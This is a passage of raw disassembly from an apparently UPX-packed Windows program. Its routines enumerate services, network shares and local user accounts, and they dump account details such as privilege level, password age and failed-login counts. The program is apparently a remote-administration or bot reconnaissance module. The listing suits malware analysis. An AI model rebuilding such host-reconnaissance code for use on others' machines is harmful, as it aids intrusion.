ja short loc_418856 jz short loc_41884C mov ecx, eax sub ecx, 3 jz short loc_418842 dec ecx dec ecx jz short loc_418838 dec ecx jz short loc_41882E sub ecx, 51h jz short loc_418824 sub ecx, 24h jnz loc_418909 ; default ; jumptable 004188B0 cases 1,5,6,8,9,12,13,15,16 push offset aTheSpecifiedSe ; "The specified service name is invalid." jmp loc_4188FB ; --------------------------------------------------------------------------- loc_418824: ; CODE XREF: sub_4187DE+31j push offset aTheRequestedCo ; "The requested control code is undefined"... jmp loc_4188FB ; --------------------------------------------------------------------------- loc_41882E: ; CODE XREF: sub_4187DE+2Cj push offset aTheHandleIsInv ; "The handle is invalid." jmp loc_4188FB ; --------------------------------------------------------------------------- loc_418838: ; CODE XREF: sub_4187DE+29j push offset aTheHandleDoesN ; "The handle does not have the required a"... jmp loc_4188FB ; --------------------------------------------------------------------------- loc_418842: ; CODE XREF: sub_4187DE+25j push offset aTheServiceBina ; "The service binary file could not be fo"... jmp loc_4188FB ; --------------------------------------------------------------------------- loc_41884C: ; CODE XREF: sub_4187DE+1Ej push offset aTheServiceCann ; "The service cannot be stopped because o"... jmp loc_4188FB ; --------------------------------------------------------------------------- loc_418856: ; CODE XREF: sub_4187DE+1Cj mov ecx, eax sub ecx, 41Ch jz short loc_418885 dec ecx jz short loc_41887E dec ecx jz short loc_418877 dec ecx jnz loc_418909 ; default ; jumptable 004188B0 cases 1,5,6,8,9,12,13,15,16 push offset aTheDatabaseIsL ; "The database is locked." jmp loc_4188FB ; --------------------------------------------------------------------------- loc_418877: ; CODE XREF: sub_4187DE+86j push offset aAThreadCouldNo ; "A thread could not be created for the s"... jmp short loc_4188FB ; --------------------------------------------------------------------------- loc_41887E: ; CODE XREF: sub_4187DE+83j push offset aTheProcessForT ; "The process for the service was started"... jmp short loc_4188FB ; --------------------------------------------------------------------------- loc_418885: ; CODE XREF: sub_4187DE+80j push offset aTheRequested_0 ; "The requested control code is not valid"... jmp short loc_4188FB ; --------------------------------------------------------------------------- loc_41888C: ; CODE XREF: sub_4187DE+11j push offset aAnInstanceOfTh ; "An instance of the service is already r"... jmp short loc_4188FB ; --------------------------------------------------------------------------- loc_418893: ; CODE XREF: sub_4187DE+Bj mov ecx, 45Bh cmp eax, ecx ja short loc_418909 ; default ; jumptable 004188B0 cases 1,5,6,8,9,12,13,15,16 jz short loc_4188F6 lea ecx, [eax-422h] cmp ecx, 11h ; switch 18 cases ja short loc_418909 ; default ; jumptable 004188B0 cases 1,5,6,8,9,12,13,15,16 movzx ecx, byte_41894A[ecx] jmp off_418922[ecx*4] ; switch jump loc_4188B7: ; DATA XREF: UPX0:off_418922o push offset aTheSpecifiedDa ; jumptable 004188B0 case 7 jmp short loc_4188FB ; --------------------------------------------------------------------------- loc_4188BE: ; CODE XREF: sub_4187DE+D2j ; DATA XREF: UPX0:off_418922o push offset aTheServiceDepe ; jumptable 004188B0 case 17 jmp short loc_4188FB ; --------------------------------------------------------------------------- loc_4188C5: ; CODE XREF: sub_4187DE+D2j ; DATA XREF: UPX0:off_418922o push offset aTheServiceDe_0 ; jumptable 004188B0 case 10 jmp short loc_4188FB ; --------------------------------------------------------------------------- loc_4188CC: ; CODE XREF: sub_4187DE+D2j ; DATA XREF: UPX0:off_418922o push offset aTheServiceHasB ; jumptable 004188B0 case 0 jmp short loc_4188FB ; --------------------------------------------------------------------------- loc_4188D3: ; CODE XREF: sub_4187DE+D2j ; DATA XREF: UPX0:off_418922o push offset aTheSpecified_0 ; jumptable 004188B0 case 2 jmp short loc_4188FB ; --------------------------------------------------------------------------- loc_4188DA: ; CODE XREF: sub_4187DE+D2j ; DATA XREF: UPX0:off_418922o push offset aTheServiceCoul ; jumptable 004188B0 case 11 jmp short loc_4188FB ; --------------------------------------------------------------------------- loc_4188E1: ; CODE XREF: sub_4187DE+D2j ; DATA XREF: UPX0:off_418922o push offset aTheServiceHa_0 ; jumptable 004188B0 case 14 jmp short loc_4188FB ; --------------------------------------------------------------------------- loc_4188E8: ; CODE XREF: sub_4187DE+D2j ; DATA XREF: UPX0:off_418922o push offset aTheRequested_1 ; jumptable 004188B0 case 3 jmp short loc_4188FB ; --------------------------------------------------------------------------- loc_4188EF: ; CODE XREF: sub_4187DE+D2j ; DATA XREF: UPX0:off_418922o push offset aTheServiceHasN ; jumptable 004188B0 case 4 jmp short loc_4188FB ; --------------------------------------------------------------------------- loc_4188F6: ; CODE XREF: sub_4187DE+BEj push offset aTheSystemIsShu ; "The system is shutting down." loc_4188FB: ; CODE XREF: sub_4187DE+41j ; sub_4187DE+4Bj ... push offset dword_4DB010 call sub_41B886 pop ecx pop ecx jmp short loc_41891C ; --------------------------------------------------------------------------- loc_418909: ; CODE XREF: sub_4187DE+36j ; sub_4187DE+89j ... push eax ; default ; jumptable 004188B0 cases 1,5,6,8,9,12,13,15,16 push offset aAnUnknownError ; "An unknown error occurred: <%ld>" push offset dword_4DB010 call sub_41B886 add esp, 0Ch loc_41891C: ; CODE XREF: sub_4187DE+129j mov eax, offset dword_4DB010 retn sub_4187DE endp ; --------------------------------------------------------------------------- off_418922 dd offset loc_4188CC ; DATA XREF: sub_4187DE+D2r dd offset loc_4188D3 ; jump table for switch statement dd offset loc_4188E8 dd offset loc_4188EF dd offset loc_4188B7 dd offset loc_4188C5 dd offset loc_4188DA dd offset loc_4188E1 dd offset loc_4188BE dd offset loc_418909 byte_41894A db 0, 9, 1, 2 ; DATA XREF: sub_4187DE+CBr db 3, 9, 9, 4 ; indirect table for switch statement db 9, 9, 5, 6 db 9, 9, 7, 9 db 9, 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41895C proc near ; CODE XREF: sub_401ACD+45D4p var_38C = byte ptr -38Ch var_18C = byte ptr -18Ch var_188 = byte ptr -188h var_24 = byte ptr -24h var_20 = byte ptr -20h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 38Ch push ebx push esi push edi xor ebx, ebx push 0F003Fh push ebx push ebx mov [ebp+var_8], ebx call ds:dword_4CB648 ; OpenSCManagerA push ebx mov [ebp+var_C], eax push [ebp+arg_8] push offset aTheFollowingWi ; "The following Windows services are regi"... push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 add esp, 14h loc_418994: ; CODE XREF: sub_41895C+120j lea eax, [ebp+var_8] push eax lea eax, [ebp+var_4] push eax lea eax, [ebp+var_24] push eax lea eax, [ebp+var_18C] push 168h push eax push 3 push 30h push [ebp+var_C] call ds:dword_4CB614 ; EnumServicesStatusA test eax, eax jnz short loc_4189CE call dword_42708C ; RtlGetLastWin32Error cmp eax, 0EAh jnz loc_418A82 loc_4189CE: ; CODE XREF: sub_41895C+5Fj xor edi, edi cmp [ebp+var_4], ebx jle loc_418A79 lea esi, [ebp+var_188] loc_4189DF: ; CODE XREF: sub_41895C+117j mov eax, [esi+8] dec eax jz short loc_418A28 dec eax jz short loc_418A21 dec eax jz short loc_418A1A dec eax jz short loc_418A13 dec eax jz short loc_418A0C dec eax jz short loc_418A05 dec eax jz short loc_4189FE push offset aUnknown_0 ; " Unknown" jmp short loc_418A2D ; --------------------------------------------------------------------------- loc_4189FE: ; CODE XREF: sub_41895C+99j push offset aPaused_0 ; " Paused" jmp short loc_418A2D ; --------------------------------------------------------------------------- loc_418A05: ; CODE XREF: sub_41895C+96j push offset aPausing ; " Pausing" jmp short loc_418A2D ; --------------------------------------------------------------------------- loc_418A0C: ; CODE XREF: sub_41895C+93j push offset aContinuing ; " Continuing" jmp short loc_418A2D ; --------------------------------------------------------------------------- loc_418A13: ; CODE XREF: sub_41895C+90j push offset aRunning ; " Running" jmp short loc_418A2D ; --------------------------------------------------------------------------- loc_418A1A: ; CODE XREF: sub_41895C+8Dj push offset aStoping ; " Stoping" jmp short loc_418A2D ; --------------------------------------------------------------------------- loc_418A21: ; CODE XREF: sub_41895C+8Aj push offset aStarting ; " Starting" jmp short loc_418A2D ; --------------------------------------------------------------------------- loc_418A28: ; CODE XREF: sub_41895C+87j push offset aStopped ; " Stopped" loc_418A2D: ; CODE XREF: sub_41895C+A0j ; sub_41895C+A7j ... lea eax, [ebp+var_20] push eax call sub_41B886 pop ecx lea eax, [ebp+var_20] pop ecx push dword ptr [esi] push dword ptr [esi-4] push eax lea eax, [ebp+var_38C] push offset aSSS ; "%s: %s (%s)" push eax call sub_41B886 push 1 lea eax, [ebp+var_38C] push [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 add esp, 28h inc edi add esi, 24h cmp edi, [ebp+var_4] jl loc_4189DF loc_418A79: ; CODE XREF: sub_41895C+77j cmp [ebp+var_8], ebx jnz loc_418994 loc_418A82: ; CODE XREF: sub_41895C+6Cj push [ebp+var_C] call ds:dword_4CB54C ; CloseServiceHandle xor eax, eax pop edi cmp eax, [ebp+var_4] pop esi pop ebx sbb eax, eax neg eax leave retn sub_41895C endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_418A99 proc near ; CODE XREF: sub_401ACD:loc_406167p arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp push esi push edi mov edi, [ebp+arg_4] test edi, edi jz loc_418B33 mov esi, [ebp+arg_0] mov eax, esi sub eax, 0 jz short loc_418AC2 dec eax jnz short loc_418B13 push edi push 0 call sub_418C6C pop ecx pop ecx jmp short loc_418B0F ; --------------------------------------------------------------------------- loc_418AC2: ; CODE XREF: sub_418A99+18j cmp [ebp+arg_8], 0 jnz short loc_418B01 push 24h push edi call sub_41BFB0 pop ecx test eax, eax pop ecx jnz short loc_418B01 push 57h pop eax loc_418AD9: ; CODE XREF: sub_418A99+78j push eax call sub_419460 pop ecx push eax lea eax, [esi+esi*2] push edi mov esi, offset dword_4DB2CC push off_439090[eax*4] push offset unk_43973C push esi call sub_41B886 add esp, 14h jmp short loc_418B53 ; --------------------------------------------------------------------------- loc_418B01: ; CODE XREF: sub_418A99+2Dj ; sub_418A99+3Bj push [ebp+arg_8] push edi push 0 call sub_418BC0 add esp, 0Ch loc_418B0F: ; CODE XREF: sub_418A99+27j test eax, eax jnz short loc_418AD9 loc_418B13: ; CODE XREF: sub_418A99+1Bj lea eax, [esi+esi*2] push edi mov esi, offset dword_4DB2CC push off_439094[eax*4] push offset dword_439720 push esi call sub_41B886 add esp, 10h jmp short loc_418B53 ; --------------------------------------------------------------------------- loc_418B33: ; CODE XREF: sub_418A99+Aj mov eax, [ebp+arg_0] mov esi, offset dword_4DB2CC lea eax, [eax+eax*2] push off_439090[eax*4] push offset unk_4396FC push esi call sub_41B886 add esp, 0Ch loc_418B53: ; CODE XREF: sub_418A99+66j ; sub_418A99+98j mov eax, esi pop edi pop esi pop ebp retn sub_418A99 endp ; =============== S U B R O U T I N E ======================================= sub_418B59 proc near ; CODE XREF: sub_419E7A+245p arg_0 = dword ptr 4 arg_C = dword ptr 10h push esi xor esi, esi cmp [esp+4+arg_0], esi jnz short loc_418B66 xor eax, eax pop esi retn ; --------------------------------------------------------------------------- loc_418B66: ; CODE XREF: sub_418B59+7j push ebx push ebp push edi push esi push esi push esi mov edi, dword_42717C push esi push 0FFFFFFFFh mov ebx, 400h push [esp+24h+arg_0] push ebx push esi call edi ; WideCharToMultiByte test ds:byte_4DB4CC, 1 mov ebp, eax jnz short loc_418BA3 or ds:byte_4DB4CC, 1 lea eax, [ebp+1] push eax call sub_41CFC5 pop ecx mov ds:dword_4DB26C, eax loc_418BA3: ; CODE XREF: sub_418B59+32j push esi push esi push ebp push ds:dword_4DB26C push 0FFFFFFFFh push [esp+18h+arg_C] push ebx push esi call edi ; WideCharToMultiByte mov eax, ds:dword_4DB26C pop edi pop ebp pop ebx pop esi retn sub_418B59 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_418BC0 proc near ; CODE XREF: sub_418A99+6Ep ; sub_41A19E+18Ap ... var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 20h push edi push [ebp+arg_0] call sub_418C2B push [ebp+arg_4] mov edi, eax call sub_418C2B push 24h mov [ebp+var_20], eax push [ebp+arg_4] call sub_41BFB0 push [ebp+arg_8] mov [ebp+var_14], 7Fh neg eax sbb eax, eax and [ebp+var_18], 0 or [ebp+var_10], 0FFFFFFFFh and [ebp+var_C], 0 and eax, 80000000h mov [ebp+var_1C], eax call sub_418C2B add esp, 14h mov [ebp+var_8], eax and [ebp+var_4], 0 lea eax, [ebp+arg_0] push eax lea eax, [ebp+var_20] push eax push 2 push edi call ds:dword_4CB548 pop edi leave retn sub_418BC0 endp ; =============== S U B R O U T I N E ======================================= sub_418C2B proc near ; CODE XREF: sub_418BC0+Ap ; sub_418BC0+14p ... arg_0 = dword ptr 4 push ebp mov ebp, [esp+4+arg_0] xor eax, eax cmp ebp, eax jnz short loc_418C38 pop ebp retn ; --------------------------------------------------------------------------- loc_418C38: ; CODE XREF: sub_418C2B+9j push ebx push esi mov esi, dword_427180 push edi push eax push eax push 0FFFFFFFFh push ebp push 1 push eax call esi ; MultiByteToWideChar mov edi, eax lea eax, [edi+edi+2] push eax call sub_41CFC5 pop ecx mov ebx, eax push edi push ebx push 0FFFFFFFFh push ebp push 1 push 0 call esi ; MultiByteToWideChar pop edi mov eax, ebx pop esi pop ebx pop ebp retn sub_418C2B endp ; =============== S U B R O U T I N E ======================================= sub_418C6C proc near ; CODE XREF: sub_418A99+20p ; sub_419E7A+1BBp ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 push esi push [esp+4+arg_0] call sub_418C2B push [esp+8+arg_4] mov esi, eax call sub_418C2B pop ecx pop ecx push 0 push eax push esi call ds:dword_4CB520 pop esi retn sub_418C6C endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_418C8F proc near ; CODE XREF: sub_401ACD+46B1p var_210 = byte ptr -210h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h push ebp mov ebp, esp sub esp, 210h push ebx push esi push edi push [ebp+arg_C] call sub_418C2B xor esi, esi mov [ebp+var_C], eax push esi mov [ebp+arg_C], esi push [ebp+arg_8] mov [ebp+var_8], esi mov [ebp+var_10], esi push offset aShareNameResou ; "Share name: Resource: "... push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 add esp, 18h loc_418CC8: ; CODE XREF: sub_418C8F+10Fj lea eax, [ebp+var_10] push eax lea eax, [ebp+var_8] push eax lea eax, [ebp+arg_C] push eax lea eax, [ebp+var_4] push 0FFFFFFFFh push eax push 1F6h push [ebp+var_C] call ds:dword_4CB598 mov ebx, eax cmp ebx, esi jz short loc_418D2B cmp ebx, 0EAh jz short loc_418D2B push ebx push ebx call sub_419460 pop ecx push eax lea eax, [ebp+var_210] push offset unk_439788 push eax call sub_41B886 push esi lea eax, [ebp+var_210] push [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 add esp, 24h jmp short loc_418D98 ; --------------------------------------------------------------------------- loc_418D2B: ; CODE XREF: sub_418C8F+5Dj ; sub_418C8F+65j push 1 pop edi cmp [ebp+arg_C], edi jb short loc_418D8F mov eax, [ebp+var_4] lea esi, [eax+14h] loc_418D39: ; CODE XREF: sub_418C8F+FCj push dword ptr [esi+10h] call ds:dword_4CB53C ; IsValidSecurityDescriptor test eax, eax mov eax, offset aYes ; "Yes" jnz short loc_418D50 mov eax, offset aNo ; "No" loc_418D50: ; CODE XREF: sub_418C8F+BAj push eax lea eax, [ebp+var_210] push dword ptr [esi] push dword ptr [esi+4] push dword ptr [esi-14h] push offset a14s24s6u4s ; "%-14S %-24S %-6u %-4s" push eax call sub_41B886 push 1 lea eax, [ebp+var_210] push [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 add esp, 2Ch add esi, 28h inc edi cmp edi, [ebp+arg_C] jbe short loc_418D39 xor esi, esi loc_418D8F: ; CODE XREF: sub_418C8F+A2j push [ebp+var_4] call ds:dword_4CB6E4 loc_418D98: ; CODE XREF: sub_418C8F+9Aj cmp ebx, 0EAh jz loc_418CC8 xor eax, eax cmp ebx, esi pop edi pop esi setz al pop ebx leave retn sub_418C8F endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_418DB0 proc near ; CODE XREF: sub_401ACD:loc_4061EFp arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch push ebp mov ebp, esp push ebx mov ebx, [ebp+arg_4] push esi push edi xor edi, edi cmp ebx, edi jz loc_418E55 mov esi, [ebp+arg_0] mov eax, esi sub eax, edi jz short loc_418DF2 dec eax jz short loc_418DE7 dec eax jnz short loc_418E0D push [ebp+arg_14] push [ebp+arg_10] push [ebp+arg_C] push ebx push edi call sub_418EF7 add esp, 14h jmp short loc_418E09 ; --------------------------------------------------------------------------- loc_418DE7: ; CODE XREF: sub_418DB0+1Dj push ebx push edi call sub_418ED6 pop ecx pop ecx jmp short loc_418E09 ; --------------------------------------------------------------------------- loc_418DF2: ; CODE XREF: sub_418DB0+1Aj cmp [ebp+arg_8], edi jz short loc_418E06 push [ebp+arg_8] push ebx push edi call sub_418E7C add esp, 0Ch jmp short loc_418E09 ; --------------------------------------------------------------------------- loc_418E06: ; CODE XREF: sub_418DB0+45j push 57h pop eax loc_418E09: ; CODE XREF: sub_418DB0+35j ; sub_418DB0+40j ... cmp eax, edi jnz short loc_418E2D loc_418E0D: ; CODE XREF: sub_418DB0+20j lea eax, [esi+esi*2] push ebx mov esi, offset dword_4DB4D0 push off_439094[eax*4] push offset unk_439840 push esi call sub_41B886 add esp, 10h jmp short loc_418E75 ; --------------------------------------------------------------------------- loc_418E2D: ; CODE XREF: sub_418DB0+5Bj push eax call sub_419460 pop ecx push eax lea eax, [esi+esi*2] push ebx mov esi, offset dword_4DB4D0 push off_439090[eax*4] push offset unk_439810 push esi call sub_41B886 add esp, 14h jmp short loc_418E75 ; --------------------------------------------------------------------------- loc_418E55: ; CODE XREF: sub_418DB0+Dj mov eax, [ebp+arg_0] mov esi, offset dword_4DB4D0 lea eax, [eax+eax*2] push off_439090[eax*4] push offset unk_4397E8 push esi call sub_41B886 add esp, 0Ch loc_418E75: ; CODE XREF: sub_418DB0+7Bj ; sub_418DB0+A3j mov eax, esi pop edi pop esi pop ebx pop ebp retn sub_418DB0 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_418E7C proc near ; CODE XREF: sub_418DB0+4Cp var_24 = dword ptr -24h var_20 = dword ptr -20h var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 24h and [ebp+var_4], 0 push edi push [ebp+arg_0] call sub_418C2B push [ebp+arg_4] mov edi, eax call sub_418C2B push [ebp+arg_8] mov [ebp+var_24], eax call sub_418C2B add esp, 0Ch mov [ebp+var_20], eax and [ebp+var_14], 0 and [ebp+var_10], 0 push 1 and [ebp+var_8], 0 pop eax lea ecx, [ebp+var_4] push ecx lea ecx, [ebp+var_24] push ecx push eax push edi mov [ebp+var_18], eax mov [ebp+var_C], 10001h call ds:dword_4CB52C pop edi leave retn sub_418E7C endp ; =============== S U B R O U T I N E ======================================= sub_418ED6 proc near ; CODE XREF: sub_418DB0+39p arg_0 = dword ptr 4 arg_4 = dword ptr 8 push esi push [esp+4+arg_0] call sub_418C2B push [esp+8+arg_4] mov esi, eax call sub_418C2B pop ecx pop ecx push eax push esi call ds:dword_4CB51C pop esi retn sub_418ED6 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_418EF7 proc near ; CODE XREF: sub_418DB0+2Dp var_204 = byte ptr -204h var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h push ebp mov ebp, esp sub esp, 204h and [ebp+var_4], 0 push esi push [ebp+arg_0] call sub_418C2B push [ebp+arg_4] mov esi, eax call sub_418C2B pop ecx pop ecx lea ecx, [ebp+var_4] push ecx push 0Bh push eax push esi call ds:dword_4CB6AC test eax, eax mov [ebp+arg_0], eax jnz loc_41929F mov eax, [ebp+var_4] test eax, eax jz loc_4192DA push ebx push edi push dword ptr [eax] lea eax, [ebp+var_204] push offset aAccountS ; "Account: %S" push eax call sub_41B886 mov esi, [ebp+arg_10] mov edi, [ebp+arg_C] mov ebx, [ebp+arg_8] push 1 lea eax, [ebp+var_204] push esi push eax push edi push ebx call sub_409A73 mov eax, [ebp+var_4] add esp, 20h push dword ptr [eax+0Ch] lea eax, [ebp+var_204] push offset aFullNameS ; "Full Name: %S" push eax call sub_41B886 push 1 lea eax, [ebp+var_204] push esi push eax push edi push ebx call sub_409A73 mov eax, [ebp+var_4] add esp, 20h push dword ptr [eax+8] lea eax, [ebp+var_204] push offset aUserCommentS ; "User Comment: %S" push eax call sub_41B886 push 1 lea eax, [ebp+var_204] push esi push eax push edi push ebx call sub_409A73 mov eax, [ebp+var_4] add esp, 20h push dword ptr [eax+4] lea eax, [ebp+var_204] push offset aCommentS ; "Comment: %S" push eax call sub_41B886 push 1 lea eax, [ebp+var_204] push esi push eax push edi push ebx call sub_409A73 mov eax, [ebp+var_4] add esp, 20h mov eax, [eax+10h] sub eax, 0 jz short loc_419016 dec eax jz short loc_41900F dec eax jz short loc_419008 mov eax, offset aUnknown ; "Unknown" jmp short loc_41901B ; --------------------------------------------------------------------------- loc_419008: ; CODE XREF: sub_418EF7+108j mov eax, offset aAdministrator ; "Administrator" jmp short loc_41901B ; --------------------------------------------------------------------------- loc_41900F: ; CODE XREF: sub_418EF7+105j mov eax, offset aUser_2 ; "User" jmp short loc_41901B ; --------------------------------------------------------------------------- loc_419016: ; CODE XREF: sub_418EF7+102j mov eax, offset aGuest ; "Guest" loc_41901B: ; CODE XREF: sub_418EF7+10Fj ; sub_418EF7+116j ... push eax lea eax, [ebp+var_204] push offset aPrivilegeLevel ; "Privilege Level: %s" push eax call sub_41B886 push 1 lea eax, [ebp+var_204] push esi push eax push edi push ebx call sub_409A73 mov eax, [ebp+var_4] add esp, 20h push dword ptr [eax+14h] lea eax, [ebp+var_204] push offset aAuthFlagsD ; "Auth Flags: %d" push eax call sub_41B886 push 1 lea eax, [ebp+var_204] push esi push eax push edi push ebx call sub_409A73 mov eax, [ebp+var_4] add esp, 20h push dword ptr [eax+1Ch] lea eax, [ebp+var_204] push offset aHomeDirectoryS ; "Home Directory: %S" push eax call sub_41B886 push 1 lea eax, [ebp+var_204] push esi push eax push edi push ebx call sub_409A73 mov eax, [ebp+var_4] add esp, 20h push dword ptr [eax+20h] lea eax, [ebp+var_204] push offset aParametersS ; "Parameters: %S" push eax call sub_41B886 push 1 lea eax, [ebp+var_204] push esi push eax push edi push ebx call sub_409A73 mov eax, [ebp+var_4] add esp, 20h push dword ptr [eax+18h] lea eax, [ebp+var_204] push offset aPasswordAgeD ; "Password Age: %d" push eax call sub_41B886 push 1 lea eax, [ebp+var_204] push esi push eax push edi push ebx call sub_409A73 mov eax, [ebp+var_4] add esp, 20h push dword ptr [eax+2Ch] lea eax, [ebp+var_204] push offset aBadPasswordCou ; "Bad Password Count: %d" push eax call sub_41B886 push 1 lea eax, [ebp+var_204] push esi push eax push edi push ebx call sub_409A73 mov eax, [ebp+var_4] add esp, 20h push dword ptr [eax+30h] lea eax, [ebp+var_204] push offset aNumberOfLogins ; "Number of Logins: %d" push eax call sub_41B886 push 1 lea eax, [ebp+var_204] push esi push eax push edi push ebx call sub_409A73 mov eax, [ebp+var_4] add esp, 20h push dword ptr [eax+24h] lea eax, [ebp+var_204] push offset aLastLogonD ; "Last Logon: %d" push eax call sub_41B886 push 1 lea eax, [ebp+var_204] push esi push eax push edi push ebx call sub_409A73 mov eax, [ebp+var_4] add esp, 20h push dword ptr [eax+28h] lea eax, [ebp+var_204] push offset aLastLogoffD ; "Last Logoff: %d" push eax call sub_41B886 push 1 lea eax, [ebp+var_204] push esi push eax push edi push ebx call sub_409A73 mov eax, [ebp+var_4] add esp, 20h push dword ptr [eax+34h] lea eax, [ebp+var_204] push offset aLogonServerS ; "Logon Server: %S" push eax call sub_41B886 push 1 lea eax, [ebp+var_204] push esi push eax push edi push ebx call sub_409A73 mov eax, [ebp+var_4] add esp, 20h push dword ptr [eax+3Ch] lea eax, [ebp+var_204] push offset aWorkstationsS ; "Workstations: %S" push eax call sub_41B886 push 1 lea eax, [ebp+var_204] push esi push eax push edi push ebx call sub_409A73 mov eax, [ebp+var_4] add esp, 20h push dword ptr [eax+38h] lea eax, [ebp+var_204] push offset aCountryCodeD ; "Country Code: %d" push eax call sub_41B886 push 1 push esi lea eax, [ebp+var_204] push eax push edi push ebx call sub_409A73 mov eax, [ebp+var_4] add esp, 20h push dword ptr [eax+4Ch] lea eax, [ebp+var_204] push offset aUserSLanguageD ; "User's Language: %d" push eax call sub_41B886 push 1 lea eax, [ebp+var_204] push esi push eax push edi push ebx call sub_409A73 mov eax, [ebp+var_4] add esp, 20h push dword ptr [eax+40h] lea eax, [ebp+var_204] push offset aMax_StorageD ; "Max. Storage: %d" push eax call sub_41B886 push 1 lea eax, [ebp+var_204] push esi push eax push edi push ebx call sub_409A73 mov eax, [ebp+var_4] add esp, 20h push dword ptr [eax+44h] lea eax, [ebp+var_204] push offset aUnitsPerWeekD ; "Units Per Week: %d" push eax call sub_41B886 push 1 lea eax, [ebp+var_204] push esi push eax push edi push ebx call sub_409A73 add esp, 20h pop edi pop ebx jmp short loc_4192CB ; --------------------------------------------------------------------------- loc_41929F: ; CODE XREF: sub_418EF7+35j push eax lea eax, [ebp+var_204] push offset unk_439860 push eax call sub_41B886 push 0 lea eax, [ebp+var_204] push [ebp+arg_10] push eax push [ebp+arg_C] push [ebp+arg_8] call sub_409A73 add esp, 20h loc_4192CB: ; CODE XREF: sub_418EF7+3A6j cmp [ebp+var_4], 0 jz short loc_4192DA push [ebp+var_4] call ds:dword_4CB6E4 loc_4192DA: ; CODE XREF: sub_418EF7+40j ; sub_418EF7+3D8j mov eax, [ebp+arg_0] pop esi leave retn sub_418EF7 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4192E0 proc near ; CODE XREF: sub_401ACD+473Cp var_218 = byte ptr -218h var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h push ebp mov ebp, esp sub esp, 218h push ebx push esi push edi xor esi, esi push [ebp+arg_C] mov [ebp+var_4], esi call sub_418C2B push esi mov [ebp+var_14], eax push [ebp+arg_8] mov [ebp+arg_C], esi mov [ebp+var_18], esi mov [ebp+var_10], esi push offset aUsernameAccoun ; "Username accounts for local system:" mov [ebp+var_8], esi push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 add esp, 18h loc_41931F: ; CODE XREF: sub_4192E0+135j lea eax, [ebp+var_10] push eax lea eax, [ebp+var_18] push eax lea eax, [ebp+arg_C] push eax lea eax, [ebp+var_4] push 0FFFFFFFFh push eax push 2 push esi push [ebp+var_14] call ds:dword_4CB5B4 cmp eax, esi mov [ebp+var_C], eax jz short loc_419380 cmp eax, 0EAh jz short loc_419380 push eax push eax call sub_419460 pop ecx push eax lea eax, [ebp+var_218] push offset unk_439A50 push eax call sub_41B886 push esi lea eax, [ebp+var_218] push [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 add esp, 24h jmp short loc_4193FB ; --------------------------------------------------------------------------- loc_419380: ; CODE XREF: sub_4192E0+62j ; sub_4192E0+69j mov edi, [ebp+var_4] cmp edi, esi jz loc_41940E xor ebx, ebx cmp [ebp+arg_C], esi jbe short loc_4193FB loc_419392: ; CODE XREF: sub_4192E0+EDj cmp edi, esi jz short loc_4193D1 push dword ptr [edi] lea eax, [ebp+var_218] push offset aS_4 ; " %S" push eax call sub_41B886 push 1 lea eax, [ebp+var_218] push [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 add esp, 20h add edi, 4 inc [ebp+var_8] inc ebx cmp ebx, [ebp+arg_C] jb short loc_419392 jmp short loc_4193FB ; --------------------------------------------------------------------------- loc_4193D1: ; CODE XREF: sub_4192E0+B4j lea eax, [ebp+var_218] push offset unk_439A1C push eax call sub_41B886 push esi lea eax, [ebp+var_218] push [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 add esp, 1Ch loc_4193FB: ; CODE XREF: sub_4192E0+9Ej ; sub_4192E0+B0j ... mov edi, [ebp+var_4] cmp edi, esi jz short loc_41940E push edi call ds:dword_4CB6E4 xor edi, edi mov [ebp+var_4], edi loc_41940E: ; CODE XREF: sub_4192E0+A5j ; sub_4192E0+120j cmp [ebp+var_C], 0EAh jz loc_41931F cmp edi, esi jz short loc_419426 push edi call ds:dword_4CB6E4 loc_419426: ; CODE XREF: 